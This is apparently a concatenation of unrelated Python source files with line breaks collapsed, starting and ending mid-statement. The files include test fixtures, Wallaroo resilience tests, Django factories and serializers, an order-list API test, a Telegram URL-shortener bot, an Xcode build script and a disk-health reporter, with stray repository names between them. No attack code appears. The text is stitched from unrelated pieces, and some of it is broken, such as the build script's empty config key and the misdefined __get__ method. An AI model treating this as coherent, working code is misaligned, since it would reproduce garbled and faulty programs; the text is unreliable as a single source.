type="text/css"), ), html.body(node) ) print e.asBytes(encoding="iso-8859-1") from importlib import import_module from typing import Any def import_from_string(import_str: Any) -> Any: import_str = str(import_str) module_str, _, attrs_str = import_str.partition(":") assert module_str and attrs_str, f"Import string '{import_str}' must be in format ':'" module = import_module(module_str) instance = module for attr in attrs_str.split("."): instance = getattr(instance, attr) return instance tests/common.py """Common data structures for testing.""" # pylint: disable=missing-docstring,no-self-use from typing import Any GLOBAL_VARIABLE = "global_value" class SomeClass: ATTR = "class_attr" def __init__(self) -> None: self.attr = "instance_attr" def _private(self) -> str: return "private_value" def __very_private(self) -> str: # pylint: disable=unused-private-member return "very_private_value" def instance_method(self) -> str: return self.attr async def async_instance_method(self) -> str: return self.attr def instance_method_with_args(self, arg1: int) -> int: return arg1 async def async_instance_method_with_args(self, arg1: int) -> int: return arg1 @classmethod def class_method(cls) -> str: return cls.ATTR @classmethod def class_method_with_args(cls, arg1: int) -> int: return arg1 @classmethod async def async_class_method(cls) -> str: return cls.ATTR @classmethod async def async_class_method_with_args(cls, arg1: int) -> int: return arg1 @staticmethod def static_method() -> str: return "static_value" @staticmethod def static_method_with_args(arg1: int) -> int: return arg1 @staticmethod async def async_static_method() -> str: return "static_value" @staticmethod async def async_static_method_with_args(arg1: int) -> int: return arg1 @property def some_property(self) -> str: return self.attr class DerivedClass(SomeClass): pass class Proxy: """Proxy to another object. This can be used to test mocking proxied objects. 
Code from OBJECT PROXYING (PYTHON RECIPE): https://code.activestate.com/recipes/496741-object-proxying/ """ def __init__(self, obj: Any) -> None: object.__setattr__(self, "_obj", obj) def __getattribute__(self, name: str) -> Any: return getattr(object.__getattribute__(self, "_obj"), name) def __delattr__(self, name: str) -> None: delattr(object.__getattribute__(self, "_obj"), name) def __setattr__(self, name: str, value: Any) -> None: setattr(object.__getattribute__(self, "_obj"), name, value) def __nonzero__(self) -> bool: return bool(object.__getattribute__(self, "_obj")) def __str__(self) -> str: return str(object.__getattribute__(self, "_obj")) def __repr__(self) -> str: return repr(object.__getattribute__(self, "_obj")) _special_names = [ "__abs__", "__add__", "__and__", "__call__", "__cmp__", "__coerce__", "__contains__", "__delitem__", "__delslice__", "__div__", "__divmod__", "__eq__", "__float__", "__floordiv__", "__ge__", "__getitem__", "__getslice__", "__gt__", "__hash__", "__hex__", "__iadd__", "__iand__", "__idiv__", "__idivmod__", "__ifloordiv__", "__ilshift__", "__imod__", "__imul__", "__int__", "__invert__", "__ior__", "__ipow__", "__irshift__", "__isub__", "__iter__", "__itruediv__", "__ixor__", "__le__", "__len__", "__long__", "__lshift__", "__lt__", "__mod__", "__mul__", "__ne__", "__neg__", "__oct__", "__or__", "__pos__", "__pow__", "__radd__", "__rand__", "__rdiv__", "__rdivmod__", "__reduce__", "__reduce_ex__", "__repr__", "__reversed__", "__rfloorfiv__", "__rlshift__", "__rmod__", "__rmul__", "__ror__", "__rpow__", "__rrshift__", "__rshift__", "__rsub__", "__rtruediv__", "__rxor__", "__setitem__", "__setslice__", "__sub__", "__truediv__", "__xor__", "next", ] @classmethod def _create_class_proxy(cls, theclass: Any) -> Any: """Creates a proxy for the given class.""" def make_method(name: str) -> Any: def method(self: Any, *args: Any, **kwargs: Any) -> Any: return getattr(object.__getattribute__(self, "_obj"), name)(*args, **kwargs) return method namespace = {} for name in cls._special_names: if hasattr(theclass, name): namespace[name] = make_method(name) return type(f"{cls.__name__}({theclass.__name__})", (cls,), namespace) def __new__(cls, obj: Any, *args: Any, **kwargs: Any) -> Any: """Creates an proxy instance referencing `obj`. (obj, *args, **kwargs) are passed to this class' `__init__`, so deriving classes can define an __init__ method of their own. Note: `_class_proxy_cache` is unique per deriving class (each deriving class must hold its own cache). 
""" try: cache = cls.__dict__["_class_proxy_cache"] except KeyError: cls._class_proxy_cache = cache = {} try: theclass = cache[obj.__class__] except KeyError: cache[obj.__class__] = theclass = cls._create_class_proxy(obj.__class__) ins = object.__new__(theclass) theclass.__init__(ins, obj, *args, **kwargs) return ins def some_function(arg1: str) -> str: return arg1 async def some_async_function(arg1: str) -> str: return arg1 #!/usr/bin/env python3 import sys from readers.read_ape import ApeReader FILE_PATH = sys.argv[1] ape_reader = ApeReader(FILE_PATH) print('Ocorrencias do erro: {}'.format(len(ape_reader.error_lines))) cores = list() for k in ape_reader.corrections: flat = [sub[1] for sub in k] cores.append(flat) print('Nenhuma sugestao de correcao: {}'.format( len([x for x in cores if len(x) < 2]))) print('Efetivamente avaliadas: {}'.format( len([x for x in cores if 'red' in x or 'green' in x or 'yellow' in x]))) print('Pelo menos uma sugestao correta: {}'.format( len([x for x in cores if 'green' in x]))) print('Pelo menos uma sugestao parcialmente correta: {}'.format( len([x for x in cores if 'yellow' in x]))) print('Pelo menos uma sugestao parcialmente correta e nenhuma correta: {}'.format( len([x for x in cores if 'yellow' in x and 'green' not in x]))) print('Pelo menos uma sugestao errada: {}'.format( len([x for x in cores if 'red' in x]))) print('Todas as sugestoes erradas: {}'.format( len([x for x in cores if 'red' in x and 'green' not in x and 'yellow' not in x]))) from random import getrandbits def getrandom(n): return [int(getrandbits(1)) for _ in range(n)] def matrix_mult(A, b): return [sum([b[i] * k for i, k in enumerate(A[m])]) for m in range(len(A))] def matrix_multiplication(A, B, C, epoch): for i in epoch: random = getrandom(len(A[0])) check = matrix_mult(A, random) result1 = matrix_mult(B, check) result2 = matrix_mult(C, random) if result1 != result2: return False return True # Copyright 2019 The Wallaroo Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. See the License for the specific language governing # permissions and limitations under the License. 
import os # This first import is required for integration harness and wallaroo lib # imports to work (it does path mungling to ensure they're available) import conformance # Test specific imports from conformance.applications.system_events import (MultiPartitionDetectorPony, MultiPartitionDetectorPython2, MultiPartitionDetectorPython3, Grow, Shrink, Crash, Recover, Rotate, Wait) from integration import clear_current_test # Example manual test: # # def test_grow1_shrink1(): # conf = {} # # ResilienceTestBaseApplications provide their own test runner # # So we only need to give it a config and a sequence of operations # with MultiPartitionDetector(config=conf) as test: # test.run_test_sequence([Wait(3), Grow(1), Wait(1), Shrink(1), Wait(1)]) #################### # Generative Tests # #################### # Test creator import sys THIS = sys.modules[__name__] # Passed to create_test RESILIENCE = os.environ.get("resilience", None) def create_test(name, app, config, ops, require_resilience=False): if require_resilience and RESILIENCE != "on": return else: def f(): with app(config, ops=ops) as test: test.run_test_sequence() f.__name__ = name f = clear_current_test(f) setattr(THIS, name, f) APPS = [MultiPartitionDetectorPony, MultiPartitionDetectorPython2, MultiPartitionDetectorPython3] #################### # Resilience Tests # #################### SOURCE_TYPES = ['alo'] SOURCE_NUMBERS = [1] RESILIENCE_SEQS = [ # wait, grow1, wait, shrink1, wait, crash2, wait, recover [Wait(3), Grow(1), Wait(2), Shrink(1), Wait(2), Crash(2), Wait(3), Recover(2), Wait(5)], # crash1, recover1 [Wait(3), Crash(1), Wait(2), Recover(1), Wait(5)], # crash2, recover2 [Wait(3), Crash(2), Wait(2), Recover(2), Wait(5)], # Log rotate [Wait(3), Rotate(), Wait(2)], # Log rotate and crash [Wait(3), Rotate(), Wait(2), Crash(1), Wait(2), Recover(1), Wait(2)], ] # Test generation - Resilience + Log rotation: for app in APPS: for ops in RESILIENCE_SEQS: for src_type in SOURCE_TYPES: for src_num in SOURCE_NUMBERS: test_name = ( 'test_resilience_{app}_{source_type}_{source_number}_{ops}' .format( app=app.name, source_type=src_type, source_number=src_num, ops='_'.join((o.name().replace(':','') for o in ops)))) create_test( name = test_name, app = app, config = {'command_parameters': {'source': src_type}, 'source_number': src_num}, ops = ops, require_resilience=True) ################# # Autoscale tests ################# OPS = [Grow(1), Grow(4), Shrink(1), Shrink(4)] SOURCE_TYPES = ['tcp', 'alo'] SOURCE_NUMBERS = [1] # Programmatically create the tests, do the name mangling, and place them # in the global scope for pytest to find for app in APPS: for o1 in OPS: for o2 in OPS: if o1 == o2: ops = [o1] else: ops = [o1, Wait(4), o2] for src_type in SOURCE_TYPES: for src_num in SOURCE_NUMBERS: test_name = ( 'test_autoscale_{app}_{source_type}_{source_number}_{ops}' .format( app=app.name, source_type=src_type, source_number=src_num, ops='_'.join((o.name().replace(':','') for o in ops)))) create_test( name = test_name, app = app, config = {'command_parameters': {'source': src_type}, 'source_number': src_num}, ops = ops, require_resilience=False) hfsfolder-python/hfsfolder_python.py #!/usr/bin/python import sys from ProcessFolders import ProcessFolders def main(): processFolders = ProcessFolders() folder = "" tojson = False tofile = False toinsert = False tocvs = False if len(sys.argv[1:]) > 0: for opt in sys.argv[1:]: if not opt.__contains__("--"): folder = opt if opt.__contains__("--version"): print("hfsfolder 1.0") if 
opt.__contains__("--tojson"): tojson = True if opt.__contains__("--tofile"): tofile = True if opt.__contains__("--toinsert"): toinsert = True if opt.__contains__("--tocvs"): tocvs = True if len(folder) > 0: data = "" outFile = "hfsfolder" if tojson: outFile += ".json" data = processFolders.processFoldersToJson(folder) if toinsert: naba = input("Inform tab number: ") naba = int(naba) outFile += "-insert.sql" data = processFolders.processFoldersToInsert(folder, naba) if tocvs: outFile += ".csv" data = processFolders.processFoldersToCSV(folder) if tofile and len(data) > 0: processFolders.processFoldersToFile(data, outFile) print("Finish process folders!") elif len(data) > 0: print(data) if not tojson and not toinsert and not tocvs and not tofile: print("Inform option!") else: if tojson or toinsert or tocvs or tofile: print("Inform folder!") else: print("HFSFolder \n" \ + "Usage:\n" \ + " python hfsfolder_python.py /folder\n\n" \ + "Options:\n" \ + " --version\n" \ + " --tojson\n" \ + " --toinsert\n" \ + " --tocvs\n" \ + " --tofile\n\n" \ + "Example:\n" \ + " python hfsfolder_python.py /folder --tojson --tofile --version\n") if __name__ == "__main__": main() import traceback from pycompss.api.task import task from pycompss.api.constraint import constraint from pycompss.api.parameter import FILE_IN, FILE_OUT from biobb_common.tools import file_utils as fu from biobb_analysis.gromacs import gmx_image import os import sys @constraint(computingUnits="1") @task(input_traj_path=FILE_IN, input_top_path=FILE_IN, output_traj_path=FILE_OUT, on_failure='IGNORE') def gmx_image_pc(input_traj_path, input_top_path, output_traj_path, properties, **kwargs): try: os.environ.pop('PMI_FD', None) os.environ.pop('PMI_JOBID', None) os.environ.pop('PMI_RANK', None) os.environ.pop('PMI_SIZE', None) gmx_image.GMXImage(input_traj_path=input_traj_path, input_top_path=input_top_path, output_traj_path=output_traj_path, properties=properties, **kwargs).launch() if not os.path.exists(output_traj_path): fu.write_failed_output(output_traj_path) except Exception: traceback.print_exc() fu.write_failed_output(output_traj_path) finally: sys.stdout.flush() sys.stderr.flush()poojavaibhavsahu/Pooja_Python Days = set(["Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday", "Sunday"]) print(Days) print(type(Days)) # print("looping through the set elements ... 
") # for i in Days: # print(i) # day=set(["sunday","monday","thuesday","wednesday","thuresday"]) print (type(day)) print(day) for i in day: print(i)"""Example module to test pyRegurgitator""" __version__ = (0, 1, 0) class Foo: def hi(self): print('Hi, this is Foo') @staticmethod def add_4(num): return 4 + num class Bar(Foo): def bar(self): print('foobar') 10-100 import os from flask import current_app def dispatch_rollout_job(rollout_dir, step_count): current_app.job_queue.put({ 'type': 'ROLLOUT', 'data': { 'rollout_dir': rollout_dir, 'rollout_id': os.path.basename(rollout_dir), 'step_count': step_count, } }) #!/usr/bin/env python3 import pexpect class Player(object): """Represents a generic Player program.""" def __init__(self, path): self.path = path self.total_correct = 0 self.total_incorrect = 0 self.total_error = 0 def start_program(self): self.program = pexpect.spawnu(self.path) def get_success_rate(self): if self.total_correct: return 1 - (self.total_incorrect / self.total_correct) else: return 0 from pathlib import Path import argparse parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter) optional = parser._action_groups.pop() required = parser.add_argument_group('required arguments') required.add_argument( '-d', '--dataset', choices=['diginetica', 'gowalla', 'lastfm'], required=True, help='the dataset name', ) required.add_argument( '-f', '--filepath', required=True, help='the file for the dataset, i.e., "train-item-views.csv" for diginetica, ' '"loc-gowalla_totalCheckins.txt" for gowalla, ' '"userid-timestamp-artid-artname-traid-traname.tsv" for lastfm', ) optional.add_argument( '-t', '--dataset-dir', default='datasets/{dataset}', help='the folder to save the preprocessed dataset', ) parser._action_groups.append(optional) args = parser.parse_args() dataset_dir = Path(args.dataset_dir.format(dataset=args.dataset)) if args.dataset == 'diginetica': from utils.data.preprocess import preprocess_diginetica preprocess_diginetica(dataset_dir, args.filepath) else: from pandas import Timedelta from utils.data.preprocess import preprocess_gowalla_lastfm csv_file = args.filepath if args.dataset == 'gowalla': usecols = [0, 1, 4] interval = Timedelta(days=1) n = 30000 else: usecols = [0, 1, 2] interval = Timedelta(hours=8) n = 40000 preprocess_gowalla_lastfm(dataset_dir, csv_file, usecols, interval, n)draihal/main-pr import factory import factory.fuzzy from faker import Faker from users.factories import StudentFactory from . import models fake = Faker(locale='ru_RU') # TODO: need to add other locale? 
class AboutUsPageFactory(factory.DjangoModelFactory): class Meta: model = models.AboutUsPage django_get_or_create = ('title', ) title = factory.lazy_attribute(lambda o: fake.sentence( nb_words=2, variable_nb_words=True, ext_word_list=None)) short_description = factory.lazy_attribute(lambda o: fake.sentence( nb_words=6, variable_nb_words=True, ext_word_list=None)) short_about_us = factory.lazy_attribute(lambda o: fake.sentence( nb_words=10, variable_nb_words=True, ext_word_list=None)) class ContactsPageFactory(factory.DjangoModelFactory): class Meta: model = models.ContactsPage django_get_or_create = ('title', ) title = factory.lazy_attribute(lambda o: fake.sentence( nb_words=2, variable_nb_words=True, ext_word_list=None)) vk = factory.lazy_attribute(lambda o: fake.url()) fb = factory.lazy_attribute(lambda o: fake.url()) ok = factory.lazy_attribute(lambda o: fake.url()) youtube = factory.lazy_attribute(lambda o: fake.url()) telegram = factory.lazy_attribute(lambda o: fake.url()) address = factory.lazy_attribute(lambda o: fake.address()) details = factory.lazy_attribute(lambda o: fake.sentence( nb_words=8, variable_nb_words=True, ext_word_list=None)) phone_number = factory.lazy_attribute(lambda o: fake.phone_number()) class CourseCategoryFactory(factory.DjangoModelFactory): class Meta: model = models.CourseCategory name = factory.lazy_attribute(lambda o: fake.sentence( nb_words=2, variable_nb_words=True, ext_word_list=None)) slug = factory.lazy_attribute(lambda o: fake.user_name()) class CourseFactory(factory.DjangoModelFactory): class Meta: model = models.Course name = factory.lazy_attribute(lambda o: fake.sentence( nb_words=2, variable_nb_words=True, ext_word_list=None)) slug = factory.lazy_attribute(lambda o: fake.user_name()) category = factory.SubFactory(CourseCategoryFactory) description = factory.lazy_attribute(lambda o: fake.sentence( nb_words=15, variable_nb_words=True, ext_word_list=None)) necessary_knowledge = factory.lazy_attribute(lambda o: fake.sentence( nb_words=15, variable_nb_words=True, ext_word_list=None)) study_process = factory.lazy_attribute(lambda o: fake.sentence( nb_words=15, variable_nb_words=True, ext_word_list=None)) graduation_project = factory.lazy_attribute(lambda o: fake.sentence( nb_words=15, variable_nb_words=True, ext_word_list=None)) after_training = factory.lazy_attribute(lambda o: fake.sentence( nb_words=15, variable_nb_words=True, ext_word_list=None)) class ReviewFactory(factory.DjangoModelFactory): class Meta: model = models.Review student = factory.SubFactory(StudentFactory) course = factory.SubFactory(CourseFactory) text = factory.lazy_attribute(lambda o: fake.sentence( nb_words=12, variable_nb_words=True, ext_word_list=None)) class MassMediaPublicationFactory(factory.DjangoModelFactory): class Meta: model = models.MassMediaPublication name = factory.lazy_attribute(lambda o: fake.sentence( nb_words=2, variable_nb_words=True, ext_word_list=None)) slug = factory.lazy_attribute(lambda o: fake.user_name()) publication_url = factory.lazy_attribute(lambda o: fake.url()) mass_media_name = factory.lazy_attribute(lambda o: fake.sentence( nb_words=3, variable_nb_words=True, ext_word_list=None)) date_of_publish = factory.lazy_attribute(lambda o: fake.date()) class SiteConfigurationFactory(factory.DjangoModelFactory): class Meta: model = models.SiteConfiguration django_get_or_create = ('title', ) title = factory.lazy_attribute(lambda o: fake.sentence( nb_words=2, variable_nb_words=True, ext_word_list=None)) short_description = factory.lazy_attribute(lambda o: 
fake.sentence( nb_words=2, variable_nb_words=True, ext_word_list=None)) 0 from random import randint def roll_int(ctx): """ User input determines the upper bound on the random int. Returns an integer between 1 and rollNum. """ rollNum = ctx.content.split(' ') if len(rollNum) > 1 and rollNum[1].isnumeric() is True: return randint(1, int(rollNum[1])) else: return None 0 """ Test basic command-line handling of the Plugin class. """ import sys from nose import with_setup from NagAconda import Plugin from test import PlugTest from optparse import OptionError class TestOptions(PlugTest): """ Test optparse integration with the Plugin class. Since our class did not actually extend OptionParser or Option, there's a chance something we did damaged the environment. This class ensures basic functionality still exists. """ def test_required(self): """ Test that required options are actually required. """ self.plugin.add_option("t", "test", "Test required parameter", required=True) try: self.plugin.start() except SystemExit as e: print (dir(e)) assert True else: assert False def test_parameter(self): """ Test that a specified parameter actually reaches our option list. """ self.plugin.add_option("t", "test", "Test required parameter", required=True) sys.argv.extend(['-t', 'this.is.a.test']) self.plugin.start() assert self.plugin.options.test == 'this.is.a.test' 1-10 from django.contrib.auth import get_user_model from rest_framework import serializers from django.core import exceptions import django.contrib.auth.password_validation as validators from .models import Dog, Club, User, Show, \ Registration, Ring, Perform, Grade User = get_user_model() class RegistrationSerializer(serializers.ModelSerializer): class Meta: model = User fields = ('username', 'password', 'last_name') extra_kwargs = {'password': {'write_only': True}} def validate_password(self, password): errors = {} try: validators.validate_password(password=password) except exceptions.ValidationError as e: errors['messages'] = list(e.messages) if errors: raise serializers.ValidationError(errors) return password def create(self, validated_data): return User.objects.create_user(**validated_data) class DogListSerializer(serializers.ModelSerializer): class Meta: model = Dog fields = "__all__" class ClubListSerializer(serializers.ModelSerializer): class Meta: model = Club fields = "__all__" class UserListSerializer(serializers.ModelSerializer): class Meta: model = User fields = ("id", "username", "first_name", "last_name", "phone_num", "town") class ShowListSerializer(serializers.ModelSerializer): allowed_dogs = serializers.ListField( child=serializers.IntegerField(), required=False, ) class Meta: model = Show fields = ("id", "show_name", "show_town", "type", "start_date", "end_date", "allowed_dogs") def __init__(self, *args, **kwargs): self._allowed_dogs_by_show = kwargs.pop('allowed_dogs_by_show', None) super(ShowListSerializer, self).__init__(*args, **kwargs) def to_representation(self, instance): ret = super().to_representation(instance) allowed_dogs = self._allowed_dogs_by_show.get(ret['id'], None) if allowed_dogs is not None: ret['allowed_dogs'] = allowed_dogs return ret class RegistrationListSerializer(serializers.ModelSerializer): class Meta: model = Registration fields = "__all__" class RingListSerializer(serializers.ModelSerializer): class Meta: model = Ring fields = "__all__" class PerformListSerializer(serializers.ModelSerializer): class Meta: model = Perform fields = "__all__" class GradeListSerializer(serializers.ModelSerializer): dog 
= serializers.SerializerMethodField() dog_id = serializers.SerializerMethodField() def get_dog_id(self, obj): return obj.perform.dog.id def get_dog(self, obj): return obj.perform.dog.dog_name class Meta: model = Grade fields = ("expert", "perform", "points1", "points2", "points3", "dog", "dog_id") import aiohttp class Http: def __init__(self,cookies=None,trust_env=False): self.cookies = cookies self.trust_env = trust_env async def __aenter__(self): self._session = aiohttp.ClientSession(cookies=self.cookies,trust_env=self.trust_env) return self async def __aexit__(self, *err): await self._session.close() self._session = None @property def fetch(self): return self._sessionapp/orders/tests/test_order_list.py import uuid from datetime import datetime, timedelta, timezone from django.contrib.auth import get_user_model from django.core.files.uploadedfile import SimpleUploadedFile from django.urls import reverse from rest_framework import status from rest_framework.test import APITestCase from orders.models import Charge, Order from request_shoutout.domain.models import Charge as DomainCharge from shoutouts.models import ShoutoutVideo from talents.models import Talent User = get_user_model() class OrderListByTalentTest(APITestCase): def do_login(self, user, password): data = { 'email': user.email, 'first_name': user.first_name, 'last_name': user.last_name, 'password': password, } response = self.client.post(reverse('accounts:signin'), data, format='json') token = response.data['access'] self.client.credentials(HTTP_AUTHORIZATION=f'Bearer {token}') def setUp(self): self.maxDiff = None password = '' user_1 = User( email='', first_name='Nome', last_name='Sobrenome', ) user_1.set_password(password) user_1.save() self.do_login(user_1, password) self.talent_1 = Talent.objects.create( user=user_1, phone_number=1, area_code=1, main_social_media='', social_media_username='', number_of_followers=1, ) self.one_hour_ago = datetime.now(timezone.utc) - timedelta(hours=1) self.order_data_1 = { 'hash_id': uuid.uuid4(), 'talent_id': self.talent_1.id, 'video_is_for': 'someone_else', 'is_from': 'MJ', 'is_to': 'Peter', 'instruction': "Go Get 'em, Tiger", 'email': '', 'is_public': True, 'expiration_datetime': self.one_hour_ago, } self.order_1 = Order.objects.create(**self.order_data_1) # expired order self.charge_data_1 = { 'order': self.order_1, 'amount_paid': 150, 'payment_date': self.one_hour_ago, 'payment_method': 'credit_card', 'status': DomainCharge.CANCELLED, } self.charge_1 = Charge.objects.create(**self.charge_data_1) self.four_days_by_now = datetime.now(timezone.utc) + timedelta(days=4) self.order_data_4 = dict(self.order_data_1) self.order_data_4['expiration_datetime'] = self.four_days_by_now self.order_data_4['hash_id'] = uuid.uuid4() self.order_4 = Order.objects.create(**self.order_data_4) self.charge_data_4 = { 'order': self.order_4, 'amount_paid': 150, 'payment_date': self.four_days_by_now, 'payment_method': 'credit_card', 'status': DomainCharge.PRE_AUTHORIZED, } self.charge_4 = Charge.objects.create(**self.charge_data_4) self.three_days_by_now = datetime.now(timezone.utc) + timedelta(days=3) self.order_data_3 = dict(self.order_data_4) self.order_data_3['expiration_datetime'] = self.three_days_by_now self.order_data_3['hash_id'] = uuid.uuid4() self.order_3 = Order.objects.create(**self.order_data_3) self.charge_data_3 = { 'order': self.order_3, 'amount_paid': 150, 'payment_date': self.three_days_by_now, 'payment_method': 'credit_card', 'status': DomainCharge.PAID, } self.charge_3 = 
Charge.objects.create(**self.charge_data_3) self.two_days_by_now = datetime.now(timezone.utc) + timedelta(days=2) self.order_data_2 = dict(self.order_data_3) self.order_data_2['expiration_datetime'] = self.two_days_by_now self.order_data_2['hash_id'] = uuid.uuid4() self.order_2 = Order.objects.create(**self.order_data_2) self.charge_data_2 = { 'order': self.order_2, 'amount_paid': 150, 'payment_date': self.two_days_by_now, 'payment_method': 'credit_card', 'status': DomainCharge.PRE_AUTHORIZED, } self.charge_2 = Charge.objects.create(**self.charge_data_2) # Some shit happened with webhook and the status were not updated self.order_data_5 = dict(self.order_data_2) self.order_data_5['expiration_datetime'] = self.one_hour_ago # expired order self.order_data_5['hash_id'] = uuid.uuid4() self.order_5 = Order.objects.create(**self.order_data_5) self.charge_data_5 = { 'order': self.order_5, 'amount_paid': 150, 'payment_date': self.two_days_by_now, 'payment_method': 'credit_card', 'status': DomainCharge.PRE_AUTHORIZED, } self.charge_5 = Charge.objects.create(**self.charge_data_5) user_2 = User.objects.create( email='', first_name='Nome', last_name='Sobrenome', ) talent_2 = Talent.objects.create( user=user_2, phone_number=1, area_code=1, main_social_media='', social_media_username='', number_of_followers=1, ) order_5 = Order.objects.create( hash_id=uuid.uuid4(), talent=talent_2, video_is_for='someone_else', is_from='MJ', is_to='Peter', instruction="Go Get 'em, Tiger", email='', is_public=True, expiration_datetime=self.two_days_by_now, ) charge_data_5 = { 'order': order_5, 'amount_paid': 150, 'payment_date': self.two_days_by_now, 'payment_method': 'credit_card', 'status': DomainCharge.PRE_AUTHORIZED, } Charge.objects.create(**charge_data_5) def test_should_list_just_payment_pre_authorized_orders(self): self.order_data_2['expiration_datetime'] = ( self.order_data_2['expiration_datetime'].isoformat().replace('+00:00', 'Z') ) self.order_data_2['charge'] = { 'amount_paid': '150.00', 'payment_date': self.two_days_by_now.isoformat().replace('+00:00', 'Z'), 'payment_method': 'credit_card', 'status': DomainCharge.PRE_AUTHORIZED, } self.order_data_4['expiration_datetime'] = ( self.order_data_4['expiration_datetime'].isoformat().replace('+00:00', 'Z') ) self.order_data_4['charge'] = { 'amount_paid': '150.00', 'payment_date': self.four_days_by_now.isoformat().replace('+00:00', 'Z'), 'payment_method': 'credit_card', 'status': DomainCharge.PRE_AUTHORIZED, } self.order_data_2.pop('hash_id') self.order_data_2['order_hash'] = str(self.order_2.hash_id) self.order_data_4.pop('hash_id') self.order_data_4['order_hash'] = str(self.order_4.hash_id) expected_orders = [self.order_data_2, self.order_data_4] response = self.client.get(reverse('orders:talent_available_orders'), format='json') self.assertEqual(response.status_code, status.HTTP_200_OK) self.assertEqual(response.json(), expected_orders) def test_should_list_just_not_fulfilled_orders(self): """Orders that already have a ShoutoutVideo attached, shouldn't be listed to Talent.""" ShoutoutVideo.objects.create( hash_id=uuid.uuid4(), order=self.order_2, talent=self.talent_1, file=SimpleUploadedFile("file.mp4", b"filecontentstring"), ) self.order_data_4['expiration_datetime'] = ( self.order_data_4['expiration_datetime'].isoformat().replace('+00:00', 'Z') ) self.order_data_4['charge'] = { 'amount_paid': '150.00', 'payment_date': self.four_days_by_now.isoformat().replace('+00:00', 'Z'), 'payment_method': 'credit_card', 'status': DomainCharge.PRE_AUTHORIZED, } 
self.order_data_4.pop('hash_id') self.order_data_4['order_hash'] = str(self.order_4.hash_id) expected_orders = [self.order_data_4] response = self.client.get(reverse('orders:talent_available_orders'), format='json') self.assertEqual(response.status_code, status.HTTP_200_OK) self.assertEqual(response.json(), expected_orders) class Reccomandation: def __init__(self, input_text): self.text = input_text def __get__(self, name ): return self.name import pyshorteners from telegram.ext import ConversationHandler from telegram import ChatAction class BotShortener(): __URL_SHORTENER = 2 def __init__(self) -> None: pass def getURL_ShortenerState(self): return self.__URL_SHORTENER def inputUrl(self, update, context): url = update.message.text urlShorter = pyshorteners.Shortener() url = urlShorter.chilpit.short(url) self.sendURL(url, update.message.chat) return ConversationHandler.END def sendURL(self, url, chat): chat.send_action( action = ChatAction.UPLOAD_PHOTO, timeout = None ) chat.send_message( text = url ) Scripts/Tupla/Tupla D5.py listagem = ('Lápis', 1.75, 'Borracha', 2, 'Caderno', 15.90, 'Estojo', 25, 'Transferidor', 4.20, 'Compasso', 9.99, 'Mochila', 120.32, 'Canetas', 22.30, 'Livro', 34.90) print('~' * 50) print(f'{"LISTAGEM DE PREÇOS ":^50}') print('~' * 50) pontos = '.' for pos in range(0, len(listagem)): if pos % 2 == 0: print(f'{listagem[pos]:.<40}', end='') else: print(f'R${listagem[pos]: >8.2f}') print('~' * 50)Eastwu5788/Trump """ Auto build xcode project and create .ipa file """ import os import sys import argparse import configparser import datetime from subprocess import Popen, PIPE py2 = sys.version_info[0] == 2 if py2: reload(sys) sys.setdefaultencoding('utf8') config_path = "./config.ini" def load_config(path): if not path or not os.path.exists(path): path = config_path config_ini = configparser.ConfigParser() config_ini.read(path) return config_ini def check_config(config): """ Check the user configuration. """ target = config["Project"]["target"] if not target: return False, "Please input the target name that you want to build" scheme = config["Project"]["scheme"] if not scheme: scheme = target return True, None def prepare_build_path(config): """ Prepare the archive and .ipa output paths. """ archive_path = config["archive_path"] ipa_path = config["ipa_path"] if not archive_path.endswith("/"): archive_path += "/" if not ipa_path.endswith("/"): ipa_path += "/" time_str = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") archive_path = archive_path + config["target"] + time_str ipa_path = ipa_path + config["target"] + time_str if not os.path.exists(archive_path): os.makedirs(archive_path, 0o777) if not os.path.exists(ipa_path): os.makedirs(ipa_path, 0o777) config["archive_path"] = archive_path config["ipa_path"] = ipa_path def auto_build_project(path, config): prepare_build_path(config) cmd = """xcodebuild -exportArchive -archivePath '%s' -exportPath '%s' -exportOptionsPlist '%s' """ % (config[""]) def main(): parser = argparse.ArgumentParser(description="Thanks for using this script!") parser.add_argument("-i", "--input", type=str, default=None, help="The path of the xcode project") args = parser.parse_args() if not args.input: print("Error: Project does not exist!") exit(0) config = load_config(path=config_path) success, message = check_config(config) if not success: print(message) exit(0) auto_build_project(args.input, config) print("Build succeeded!") if __name__ == "__main__": main() 1-10 # import sys # input = sys.stdin.readline N, *a = [int(x) for x in open(0)] a.insert(0, None) first = 1 pres = first count = 0 nex = a[pres] #
press the button count += 1 for i in range(N - 1): # operations are at most N-1 times. if nex == 2: break prev = pres pres = nex nex = a[pres] # press the button count += 1 if nex == prev or nex == pres: break if nex == 2: print(count) else: print(-1) """Read S.M.A.R.T. disk information and raise alarms where needed""" import pySMART import tabulate def get_smart_attribute(drive, attribute): for driveattribute in drive.attributes: if not driveattribute: continue if driveattribute.name == attribute: return float(driveattribute.raw) def get_drive_age(drive): hours = get_smart_attribute(drive, 'Power_On_Hours') if not hours: return 'n/a' return str("%8.2f" % (hours / 24 / 365)) + ' years' def get_drive_temperature(drive): temp = get_smart_attribute(drive, 'Temperature_Celsius') if temp: temp = str(temp) + "C" return temp def get_drive_reallocated_sectors(drive): return get_smart_attribute(drive, 'Reallocated_Sector_Ct') def get_drive_information(drive): temp = get_drive_temperature(drive) age = get_drive_age(drive) reallocated_sectors = get_drive_reallocated_sectors(drive) data = [drive.name, drive.assessment, drive.model, drive.serial, drive.capacity, temp, age, reallocated_sectors] return data def get_information_on_drives(devlist): header = ['Name', 'Health', 'Model', 'Serial', 'Capacity', 'Temperature', 'Age (on)', 'Reallocated Sectors'] data = [] for device in devlist.devices: data.append(get_drive_information(device)) return header, data def get_devices(): return pySMART.DeviceList() def format_drive_info(header, drive_info): return '{} has health status: {}\nModel: {}\nTemperature: {}, {} reallocated sectors.\nIts age is {} years.'.format( drive_info[header.index('Name')], drive_info[header.index('Health')], drive_info[header.index('Model')], drive_info[header.index('Temperature')], drive_info[header.index('Reallocated Sectors')], drive_info[header.index('Age (on)')].strip() ) def main(): devlist = get_devices() header, data = get_information_on_drives(devlist) print(tabulate.tabulate(data, header, 'rst')) if __name__ == "__main__": main() """Rendering utilities for samplesheets""" import functools import itertools import logging from 